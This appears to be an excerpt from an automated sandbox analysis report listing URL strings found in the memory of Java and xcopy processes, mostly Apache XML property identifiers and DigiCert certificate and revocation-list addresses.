Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerF
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerdProF
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factorynt7
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schemarocess
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler9
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/ion
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/locale
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/localeJ
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation?
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationonditi?
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationaK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager#
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationG
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationtack
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition(
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitiont(
Source: javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes(
Source: javaw.exe, 00000001.00000002.2956709894.00000000097A6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D91000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009778000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D71000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSi3w
Source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSi3wD_
Source: xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842945665.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1789954778.000000000229D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1785372831.000000000229D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://casper.beckman.uiuc.edu/~c-tsai4
Source: xcopy.exe, 00000012.00000003.1850623347.00000000022A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://chasen.aist-nara.ac.jp/chasen/distribution.html
Source: javaw.exe, 00000001.00000002.2956709894.00000000097E3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.2956709894.00000000097B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009778000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004A4B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D71000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849055467.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1790732794.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1839145185.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1831479640.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1842865552.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809404812.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1811402420.0000000002829000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809302095.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1791757917.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1827004931.000000000229E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
